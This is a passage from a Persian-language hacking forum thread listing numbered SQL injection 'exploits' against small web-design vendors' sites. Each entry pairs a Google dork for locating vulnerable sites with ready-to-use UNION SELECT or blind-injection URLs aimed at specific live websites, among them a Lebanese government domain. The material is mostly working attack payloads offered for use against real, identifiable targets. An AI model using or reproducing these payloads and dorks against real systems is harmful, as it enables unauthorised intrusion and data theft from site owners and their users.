discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

Exploit 17 Codegrap - SQL Injection vulnerability 

*********************************************************
#Exploit Title: Codegrap - SQL Injection vulnerability
#Date: 2020-09-01
#Vendor Homepage: http://codegrap.com.ve
#Google Dork: "by Codegrap"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "by Codegrap"

Demo 1:
https://www.gencotire.com.ve/product.php?id=-19%27%20/*!50000union*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,version(),11,12,13,14,15--+

Demo 2:
https://www.pvca.com.ve/product-detail.php?id=-25%27%20/*!12345union*/%20select%201,2,3,4,5,6,version(),8,9,10,11--+

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

 

 Exploit 18  MANIA - SQL Injection vulnerability 

 

*********************************************************
#Exploit Title: MANIA - SQL Injection vulnerability
#Date: 2020-09-01
#Google Dork: "Made by MANIA"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "Made by MANIA"

Demo 1:
https://viamedi.co/news.php?id=-23%20/*!12345union*/%20/*!12345select*/%2011111,version(),33333,44444,55555--

Demo 2:
http://kkborac.com/prijava/show?id=-10%20/*!12345union*/%20/*!12345select*/%201,version(),3,4,5--

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Exploit 19 : Viper Online – SQL Injection vulnerability

********************************************************* 
#Exploit Title: Viper Online – SQL Injection vulnerability
#Date: 2020-08-26
#Vendor Homepage: https://viperonline.com.au
#Google Dork: "Website by: Viper Online"
#Category:webapps
#Tested On: windows 10, Firefox
 
Demo : https://www.reomart.com.au/product.php?id=-52%27%20union%20select%20version()--+

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Exploit 20 : QPlusHost - SQL Injection vulnerability

*********************************************************
#Exploit Title: QPlusHost - SQL Injection vulnerability
#Date: 2020-08-26
#Vendor Homepage: https://www.qplushost.com and https://www.qpc.co.th
#Google Dork: "Powered by QPlusHost.com" or "Powered by QPC.co.th"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "Powered by QPlusHost.com"

Demo 1:
https://www.shoethailand.com/products.php?ac=women&cid=1&scid=28%20and%200%20/*!12345UNION*/%20SELECT%201,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105--

Demo 2:
https://www.maeban.co.th/features_detail.php?id=-653%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

Demo 3:
https://www.babybbb.com/news_detail.php?nid=-4298%20UNION%20SELECT%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--

Demo 4:
http://www.banrimkwae.com/accommodations_detail.php?id=-22%20/*!12345union*/%20select%201,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

Demo 5:
http://www.thaiplasticbox.com/product_detail.php?cid=-5%20/*!12345union*/%20select%201,2,3,4,version(),6,7,8,9,10,11,12,13--

Demo 6:
https://www.johnsonfilmsthailand.com/product_list.php?gp=1&c=11&sc=7%27%20and%200%20/*!12345union*/%20select%201,2,3,4,version(),6,7,8,9,10,11,12,13,14,15--+

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Exploit 21 : Media Network – Blind Sql Injection Vulnerability

#Exploit Title: Media Network – Blind Sql Injection Vulnerability
#Date: 2020-08-17
#Vendor Homepage: http://medianetworkcc.com
#Google Dork: "Powered by Media Network"
#Category:webapps
#Tested On: windows 10, Firefox
 
[+] First add "and true" and then "and false" to the end of the link :

* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false


### Demo 1:
* https://nabatieh.gov.lb/t6.php?id=34%20and%20true
* https://nabatieh.gov.lb/t6.php?id=34%20and%20false
* https://nabatieh.gov.lb/t6.php?id=34%20and%20substring(@@version,1,1)=5

### Demo 2:
* http://medianetworkcc.com/preview_news.php?id=54%20and%20true
* http://medianetworkcc.com/preview_news.php?id=54%20and%20false
* http://medianetworkcc.com/preview_news.php?id=54%20and%20substring(@@version,1,1)=1

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Exploit 22 : RedJasmin Sql injection vulnerability

# Exploit Title : RedJasmin Sql injection vulnerability
# Date : 18/11/2016
# Vendor Homepage : www.redjasmin.com
# Google Dork : "Designed & Developed by Redjasmin.com"
# category : webapps
# Tested on : windows 7 ,firefox

Proof of Concept :

 search google Dork : "Designed & Developed by Redjasmin.com"
 Demo : http://www.tmpower.net/product.php?cg_id=5'[sql injrction vulnerability]
 Demo : http://www.genesis-envi.com/detail.php?pcode=a01'[sql injrction vulnerability]
 

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری